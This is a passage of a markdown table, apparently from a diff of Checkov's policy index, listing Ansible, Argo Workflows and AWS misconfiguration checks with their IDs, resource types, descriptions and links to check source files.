used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 138 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 139 | CKV2_ANSIBLE_1 | resource | tasks.ansible.builtin.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | -| 140 | CKV2_ANSIBLE_1 | resource | tasks.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | -| 141 | CKV2_ANSIBLE_2 | resource | tasks.ansible.builtin.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | -| 142 | CKV2_ANSIBLE_2 | resource | tasks.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | -| 143 | CKV2_ANSIBLE_3 | resource | block | Ensure block is handling task errors properly | Ansible | [BlockErrorHandling.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/BlockErrorHandling.yaml) | -| 144 | CKV2_ANSIBLE_4 | resource | tasks.ansible.builtin.dnf | Ensure that packages with untrusted or missing GPG signatures 
are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | -| 145 | CKV2_ANSIBLE_4 | resource | tasks.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | -| 146 | CKV2_ANSIBLE_5 | resource | tasks.ansible.builtin.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | -| 147 | CKV2_ANSIBLE_5 | resource | tasks.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | -| 148 | CKV2_ANSIBLE_6 | resource | tasks.ansible.builtin.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | -| 149 | CKV2_ANSIBLE_6 | resource | tasks.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | -| 150 | CKV_ARGO_1 | argo_workflows | spec | Ensure Workflow pods are not using the default ServiceAccount | Argo Workflows | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/DefaultServiceAccount.py) | -| 151 | CKV_ARGO_2 | argo_workflows | spec | Ensure Workflow pods are running as non-root user | Argo Workflows | [RunAsNonRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/RunAsNonRoot.py) | -| 152 | 
CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | -| 153 | CKV_AWS_1 | resource | serverless_aws | Ensure IAM policies that allow full "*-*" administrative privileges are not created | serverless | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AdminPolicyDocument.py) | -| 154 | CKV_AWS_2 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure ALB protocol is HTTPS | Cloudformation | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py) | -| 155 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 156 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 157 | CKV_AWS_3 | resource | AWS::EC2::Volume | Ensure all data stored in the EBS is securely encrypted | Cloudformation | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EBSEncryption.py) | -| 158 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | -| 159 | CKV_AWS_5 | resource | AWS::Elasticsearch::Domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Cloudformation | 
[ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchEncryption.py) | -| 160 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 161 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 162 | CKV_AWS_6 | resource | AWS::Elasticsearch::Domain | Ensure all Elasticsearch has node-to-node encryption enabled | Cloudformation | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 163 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 164 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 165 | CKV_AWS_7 | resource | AWS::KMS::Key | Ensure rotation for customer created CMKs is enabled | Cloudformation | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSRotation.py) | -| 166 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | 
Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | -| 167 | CKV_AWS_8 | resource | AWS::AutoScaling::LaunchConfiguration | Ensure all data stored in the Launch configuration EBS is securely encrypted | Cloudformation | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 168 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 169 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 170 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | -| 171 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | -| 172 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | 
[PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | -| 173 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | -| 174 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | -| 175 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | -| 176 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | -| 177 | CKV_AWS_16 | resource | AWS::RDS::DBInstance | Ensure all data stored in the RDS is securely encrypted at rest | Cloudformation | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEncryption.py) | -| 178 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | -| 179 | CKV_AWS_17 | resource | AWS::RDS::DBInstance | Ensure all data stored in RDS is not publicly accessible | Cloudformation | 
[RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSPubliclyAccessible.py) | -| 180 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 181 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 182 | CKV_AWS_18 | resource | AWS::S3::Bucket | Ensure the S3 bucket has access logging enabled | Cloudformation | [S3AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3AccessLogs.py) | -| 183 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | -| 184 | CKV_AWS_19 | resource | AWS::S3::Bucket | Ensure the S3 bucket has server-side-encryption enabled | Cloudformation | [S3Encryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Encryption.py) | -| 185 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 186 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | 
[S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 187 | CKV_AWS_20 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow READ permissions to everyone | Cloudformation | [S3PublicACLRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLRead.py) | -| 188 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 189 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 190 | CKV_AWS_21 | resource | AWS::S3::Bucket | Ensure the S3 bucket has versioning enabled | Cloudformation | [S3Versioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Versioning.py) | -| 191 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 192 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 193 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | 
[SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) | -| 194 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroup | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 195 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupEgress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 196 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupIngress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 197 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 198 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 199 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 200 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule 
has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 201 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 202 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 203 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 204 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 205 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 206 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | 
[SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 207 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 208 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 209 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 210 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 211 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 212 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | 
[SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 213 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 214 | CKV_AWS_26 | resource | AWS::SNS::Topic | Ensure all data stored in the SNS topic is encrypted | Cloudformation | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SNSTopicEncryption.py) | -| 215 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | -| 216 | CKV_AWS_27 | resource | AWS::SQS::Queue | Ensure all data stored in the SQS queue is encrypted | Cloudformation | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SQSQueueEncryption.py) | -| 217 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | -| 218 | CKV_AWS_28 | resource | AWS::DynamoDB::Table | Ensure DynamoDB point in time recovery (backup) is enabled | Cloudformation | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbRecovery.py) | -| 219 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | 
[DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | -| 220 | CKV_AWS_29 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Cloudformation | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 221 | CKV_AWS_29 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 222 | CKV_AWS_30 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 223 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 224 | CKV_AWS_31 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Cloudformation | 
[ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) |
-| 225 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) |
-| 226 | CKV_AWS_32 | resource | AWS::ECR::Repository | Ensure ECR policy is not set to public | Cloudformation | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRPolicy.py) |
-| 227 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) |
-| 228 | CKV_AWS_33 | resource | AWS::KMS::Key | Ensure KMS key policy does not contain wildcard (*) principal | Cloudformation | [KMSKeyWildCardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSKeyWildCardPrincipal.py) |
-| 229 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) |
-| 230 | CKV_AWS_34 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution ViewerProtocolPolicy is set to HTTPS | Cloudformation | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionEncryption.py) |
-| 231 | CKV_AWS_34 | resource | 
aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) |
-| 232 | CKV_AWS_35 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Cloudformation | [CloudtrailEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py) |
-| 233 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) |
-| 234 | CKV_AWS_36 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail log file validation is enabled | Cloudformation | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailLogValidation.py) |
-| 235 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) |
-| 236 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) |
-| 237 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) |
-| 238 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public 
endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) |
-| 239 | CKV_AWS_40 | resource | AWS::IAM::Policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Cloudformation | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
-| 240 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
-| 241 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
-| 242 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) 
| Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
-| 243 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) |
-| 244 | CKV_AWS_41 | resource | serverless_aws | Ensure no hard coded AWS access key and secret key exists in provider | serverless | [AWSCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AWSCredentials.py) |
